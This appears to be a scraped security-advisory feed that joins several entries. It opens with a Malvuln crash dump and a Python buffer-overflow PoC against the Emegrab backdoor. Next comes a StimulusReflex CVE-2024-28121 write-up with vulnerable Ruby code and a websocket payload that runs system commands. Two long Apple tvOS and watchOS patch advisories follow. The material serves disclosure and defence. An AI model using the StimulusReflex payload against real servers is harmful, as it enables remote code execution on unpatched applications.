BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 41414141 to 0040fa2b

FRAME_ONE_INVALID: 1

STACK_TEXT:    
260f6298 0040fa2b backdoor_win32_emegrab_b+0xfa2b  
260fff88 41414141 unknown!printable+0x0  
260fff8c 41414141 unknown!printable+0x0  
260fff90 41414141 unknown!printable+0x0  
260fff94 41414141 unknown!printable+0x0  
260fff98 41414141 unknown!printable+0x0  
260fff9c 41414141 unknown!printable+0x0  
260fffa0 41414141 unknown!printable+0x0  
260fffa4 41414141 unknown!printable+0x0  
260fffa8 41414141 unknown!printable+0x0  
260fffac 41414141 unknown!printable+0x0  
260fffb0 41414141 unknown!printable+0x0  
260fffb4 41414141 unknown!printable+0x0  
260fffb8 41414141 unknown!printable+0x0  
260fffbc 41414141 unknown!printable+0x0  
260fffc0 41414141 unknown!printable+0x0  
260fffc4 41414141 unknown!printable+0x0  
260fffc8 41414141 unknown!printable+0x0  
260fffcc 41414141 unknown!printable+0x0  
260fffd0 41414141 unknown!printable+0x0  
260fffd4 41414141 unknown!printable+0x0  
260fffd8 41414141 unknown!printable+0x0  
260fffdc 41414141 unknown!printable+0x0  
260fffe0 41414141 unknown!printable+0x0  
260fffe4 41414141 unknown!printable+0x0  
260fffe8 41414141 unknown!printable+0x0  
260fffec 41414141 unknown!printable+0x0  
260ffff0 41414141 unknown!printable+0x0  
260ffff4 41414141 unknown!printable+0x0  
260ffff8 41414141 unknown!printable+0x0  
260ffffc 41414141 unknown!printable+0x0  
26100000 41414141 unknown!printable+0x0

STACK_COMMAND:  .cxr 00000000260F5E38 ; kb ; dds 260f6298 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  backdoor_win32_emegrab_b+fa2b

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Emegrab_b_19a14d0414aec62ef38378de2e8b259d

IMAGE_NAME:  Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e

DEBUG_FLR_IMAGE_TIMESTAMP:  4a822c0e

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Emegrab.b.19a14d0414aec62ef38378de2e8b259d.e!Unknown

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_emegrab_b+fa2b  
0:009> !exchain  
260013fc: ntdll!ExecuteHandler2+44 (775e9d70)  
260fffcc: 41414141  
Invalid exception stack at 41414141

Exploit/PoC:  
from socket import *

MALWARE_HOST="x.x.x.x"  
PORT=2323  
s=socket(AF_INET, SOCK_STREAM)  
s.connect((MALWARE_HOST, PORT))

PAYLOAD="A"*666  
s.send(PAYLOAD.encode())  
s.close()

print("Backdoor.Win32.Emegrab BOF Exploit by Malvuln")

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Backdoor.Win32.Emegrab.b MVID-2024-0675 Buffer Overflow

StimulusReflex versions 3.5.0 up to and including 3.5.0.rc2 and 3.5.0.pre10 suffer from an arbitrary code execution vulnerability.

    StimulusReflex CVE-2024-28121Arbitrary code execution in StimulusReflex. This affects version 3.5.0 up to and including 3.5.0.rc2 and v3.5.0.pre10.## Vulnerable code excerptstimulus_reflex/lib/stimulus_reflex/reflex.rb```  # Invoke the reflex action specified by `name` and run all callbacks  def process(name, *args)    run_callbacks(:process) { public_send(name, *args) }  end```stimulus_reflex/app/channels/stimulus_reflex/channel.rb```  def delegate_call_to_reflex(reflex)    method_name = reflex.method_name    arguments = reflex.data.arguments    method = reflex.method(method_name)    policy = StimulusReflex::ReflexMethodInvocationPolicy.new(method, arguments)    if policy.no_arguments?      reflex.process(method_name)    elsif policy.arguments?      reflex.process(method_name, *arguments)    else      raise ArgumentError.new("wrong number of arguments (given #{arguments.inspect}, expected #{policy.required_params.inspect}, optional #{policy.optional_params.inspect})")    end  end```stimulus_reflex/lib/stimulus_reflex/policies/reflex_invocation_policy.rb```module StimulusReflex  class ReflexMethodInvocationPolicy    attr_reader :arguments, :required_params, :optional_params    def initialize(method, arguments)      @arguments = arguments      @required_params = method.parameters.select { |(kind, _)| kind == :req }      @optional_params = method.parameters.select { |(kind, _)| kind == :opt }    end    def no_arguments?      arguments.size == 0 && required_params.size == 0    end    def arguments?      arguments.size >= required_params.size && arguments.size <= required_params.size + optional_params.size    end    def unknown?      return false if no_arguments?      return false if arguments?      true    end  endend```## PayloadFind a websocket message with target and args.```\"target\":\"StimulusReflex::Reflex#render_collection\",\"args\":[{\"inline\": \"<% system('[command here]') %>\"}]```

StimulusReflex 3.5.0 Arbitrary Code Execution

Apple Security Advisory 03-07-2024-6 - tvOS 17.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-6 tvOS 17.4

tvOS 17.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214086.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

Image Processing  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code with kernel  
privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-23270: an anonymous researcher

ImageIO  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Metal  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An application may be able to read restricted memory  
Description: A validation issue was addressed with improved input  
sanitization.  
CVE-2024-23264: Meysam Firouzi @R00tkitsmm working with Trend Micro Zero  
Day Initiative

RTKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Siri  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

Spotlight  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to leak sensitive user information  
Description: This issue was addressed through improved state management.  
CVE-2024-23241

UIKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple TV HD and Apple TV 4K (all models)  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, Ned Williamson of Google Project  
Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Photos  
We would like to acknowledge Abhay Kailasia (@abhay_kailasia) of Lakshmi  
Narain College Of Technology Bhopal for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Apple TV will periodically check for software updates. Alternatively,  
you may manually check for software updates by selecting "Settings ->  
System -> Software Update -> Update Software."  To check the current  
version of software, select "Settings -> General -> About."  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqcgcACgkQX+5d1TXa  
IvrIdQ/9HRpg5/rTwCLemvmrsOZ3yt/cvAd9UD9uy9BFVL3yQfAStC1GBdCIZlc7  
5DUtJVCGMDb77PDK64P74Z2METMrvy5jeSCkAlCHv1FYe4F4LC8j01Dj9CEms6uI  
QAfvzSMrbVaBlXJte/x1IeI+zXwtZS4XgvpYH3kjoZbeGspxOM5z3vKRvuk0WNC9  
7FHJ43HFecsHF6mBe7Nr/8iwMxtsNwWKknaT4wywXE8hEde1OaSVya370H38SS+n  
GuSG2ivIDN8hGVvL8pCqqVqzAtNq5BzVSQ4aQ1+4MDB8QWLP/FGnjYi83qS6hDO0  
AE5TGvMOKfxqKwg4eh4ohtSvsHzXrEVG5yQgvVpz4yd4JxRizSGBloDhyDLlXL+l  
1PnuFaPFx+b6EkvafIdzo4b1O2Y6CnDy0iFrXdU3pbWG/QImxL6Krg6NtXcHGFWD  
h7iNnhJ14elhKEwTuoI0c9QlRTwRyCKSdrM8AEravz8VaoHGXJlb1SPtLUAejwH4  
kOoAT+zAb4EOELUWtgSk4d+tQeBKhD6sgOPkn6olGi5X0HJTHxiMqFCMbfNDk8Ko  
gTuMdmCOLYRbTSqoaJWW2gv9hLYoYBul9tKRgrQT6WdfKbH5WiCvZ9v7z1N4Ur8+  
l7syGGcrIX/eC2lZWGfaw49fLobn8PGvaM6cxazDhEYl9BRGlpc=  
=AI8u  
-----END PGP SIGNATURE-----

Apple Security Advisory 03-07-2024-6

Apple Security Advisory 03-07-2024-5 - watchOS 10.4 addresses buffer overflow, bypass, and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-03-07-2024-5 watchOS 10.4

watchOS 10.4 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT214088.

Apple maintains a Security Releases page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

Accessibility  
Available for: Apple Watch Series 4 and later  
Impact: A malicious app may be able to observe user data in log entries  
related to accessibility notifications  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23291

AppleMobileFileIntegrity  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to elevate privileges  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23288: Wojciech Regula of SecuRing (wojciechregula.blog) and  
Kirin (@Pwnrin)

CoreBluetooth - LE  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access Bluetooth-connected microphones  
without user permission  
Description: An access issue was addressed with improved access  
restrictions.  
CVE-2024-23250: Guilherme Rambo of Best Buddy Apps (rambo.codes)

file  
Available for: Apple Watch Series 4 and later  
Impact: Processing a file may lead to a denial-of-service or potentially  
disclose memory contents  
Description: This issue was addressed with improved checks.  
CVE-2022-48554

ImageIO  
Available for: Apple Watch Series 4 and later  
Impact: Processing an image may lead to arbitrary code execution  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2024-23286: Dohyun Lee (@l33d0hyun)

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A race condition was addressed with additional validation.  
CVE-2024-23235

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to cause unexpected system termination or  
write kernel memory  
Description: A memory corruption vulnerability was addressed with  
improved locking.  
CVE-2024-23265: Xinru Chi of Pangu Lab

Kernel  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23225

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: The issue was addressed with improved checks.  
CVE-2024-23278: an anonymous researcher

libxpc  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to execute arbitrary code out of its sandbox  
or with certain elevated privileges  
Description: The issue was addressed with improved memory handling.  
CVE-2024-0258: ali yabuz

MediaRemote  
Available for: Apple Watch Series 4 and later  
Impact: A malicious application may be able to access private  
information  
Description: The issue was addressed with improved checks.  
CVE-2024-23297: scj643

Messages  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved handling of  
temporary files.  
CVE-2024-23287: Kirin (@Pwnrin)

RTKit  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with arbitrary kernel read and write capability may  
be able to bypass kernel memory protections. Apple is aware of a report  
that this issue may have been exploited.  
Description: A memory corruption issue was addressed with improved  
validation.  
CVE-2024-23296

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to leak sensitive user information  
Description: A race condition was addressed with improved state  
handling.  
CVE-2024-23239: Mickey Jin (@patch1t)

Sandbox  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A logic issue was addressed with improved restrictions.  
CVE-2024-23290: Wojciech Regula of SecuRing (wojciechregula.blog)

Share Sheet  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to access user-sensitive data  
Description: A privacy issue was addressed with improved private data  
redaction for log entries.  
CVE-2024-23231: Kirin (@Pwnrin) and luckyu (@uuulucky)

Siri  
Available for: Apple Watch Series 4 and later  
Impact: A person with physical access to a device may be able to use  
Siri to access private calendar information  
Description: A lock screen issue was addressed with improved state  
management.  
CVE-2024-23289: Lewis Hardy

Siri  
Available for: Apple Watch Series 4 and later  
Impact: An attacker with physical access may be able to use Siri to  
access sensitive user data  
Description: This issue was addressed through improved state management.  
CVE-2024-23293: Bistrit Dahal

UIKit  
Available for: Apple Watch Series 4 and later  
Impact: An app may be able to break out of its sandbox  
Description: This issue was addressed by removing the vulnerable code.  
CVE-2024-23246: Deutsche Telekom Security GmbH sponsored by Bundesamt  
für Sicherheit in der Informationstechnik

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing web content may lead to arbitrary code execution  
Description: The issue was addressed with improved memory handling.  
WebKit Bugzilla: 259694  
CVE-2024-23226: Pwn2car

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A malicious website may exfiltrate audio data cross-origin  
Description: The issue was addressed with improved UI handling.  
WebKit Bugzilla: 263795  
CVE-2024-23254: James Lee (@Windowsrcer)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved validation.  
WebKit Bugzilla: 264811  
CVE-2024-23263: Johan Carlsson (joaxcar)

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: A maliciously crafted webpage may be able to fingerprint the  
user  
Description: An injection issue was addressed with improved validation.  
WebKit Bugzilla: 266703  
CVE-2024-23280: an anonymous researcher

WebKit  
Available for: Apple Watch Series 4 and later  
Impact: Processing maliciously crafted web content may prevent Content  
Security Policy from being enforced  
Description: A logic issue was addressed with improved state management.  
WebKit Bugzilla: 267241  
CVE-2024-23284: Georg Felber and Marco Squarcina

Additional recognition

CoreAnimation  
We would like to acknowledge Junsung Lee for their assistance.

CoreMotion  
We would like to acknowledge Eric Dorphy of Twin Cities App Dev LLC for  
their assistance.

Find My  
We would like to acknowledge Meng Zhang (鲸落) of NorthSea for their  
assistance.

Kernel  
We would like to acknowledge Tarek Joumaa (@tjkr0wn) for their  
assistance.

libxml2  
We would like to acknowledge OSS-Fuzz, and Ned Williamson of Google  
Project Zero for their assistance.

libxpc  
We would like to acknowledge Rasmus Sten, F-Secure (Mastodon:  
@pajp@blog.dll.nu), and an anonymous researcher for their assistance.

Power Management  
We would like to acknowledge Pan ZhenPeng (@Peterpan0927) of STAR Labs  
SG Pte. Ltd. for their assistance.

Sandbox  
We would like to acknowledge Zhongquan Li (@Guluisacat) for their  
assistance.

Siri  
We would like to acknowledge Bistrit Dahal for their assistance.

Software Update  
We would like to acknowledge Bin Zhang of Dublin City University for  
their assistance.

WebKit  
We would like to acknowledge Nan Wang (@eternalsakura13) of 360  
Vulnerability Research Institute, Valentino Dalla Valle, Pedro Bernardo,  
Marco Squarcina, and Lorenzo Veronese of TU Wien for their assistance.

Instructions on how to update your Apple Watch software are available  
at https://support.apple.com/kb/HT204641  To check the version on  
your Apple Watch, open the Apple Watch app on your iPhone and select  
"My Watch > General > About".  Alternatively, on your watch, select  
"My Watch > General > About".  
All information is also posted on the Apple Security Releases  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmXqceUACgkQX+5d1TXa  
IvonOhAAwwl6+Y0b68Rv2candfehqbFS9AF1RoPqGJyBZ+BcPszyPktyhxfBV7jQ  
HRiR/GCFn+m8wFtARsEQ7dqe2me/qW7Gmq7jre5A4oasMNJzSWJ/5y1hcKkbnT2A  
tWYzbqtDTmxwcPgOPEZxmOZr85TRcWcyHqOMFFKXM5iwq6bChItd0q4YqpDKIJqJ  
VvrmxWZ8xEhAqxuWUMDomGEldQB+omlZDdE+Vy6cr+vJRUt9J06GQghZG5lVTQI3  
Bv0wuNhmm0cw9rKOhUeqCwWjjzKqUodz70RgK3ihvlq3348BTNaKVL7rj/Xjla32  
Ov5VUqgPl7TZ+cndITT2XTLD7PV5Jcb5emyQiMlVmUS+gLs0EDcwdelycsZ9BWIy  
lMIqapJojAtaUiMSxgjYiILpNvBpgtgwh7kVNzPh5B740H5GuEF5WTtSDWupJ+/R  
voTF1VIBeG/Q3W63Sg39D909Gw+xoiqtw+EF4E44xrzAnNb6mefbUpNKu9533WcD  
wpJzg0lj0cTHwEvOHMqARVoFGNf8a8awPHzwugiZVuigW7eKjm+iXkhKJRxovi5r  
A2UlktISxWrcJ4jD3BS/MLOtD62IKIH4yWr7TR9Lku3JE7X4TZHzqzcOzPaTTCl7  
NGW88NsCC7F1k2kJltcEXBP4WhkMJNcZzBjJRoahScWUOxNd0FE=  
=6g/T  
-----END PGP SIGNATURE-----

Tag

#web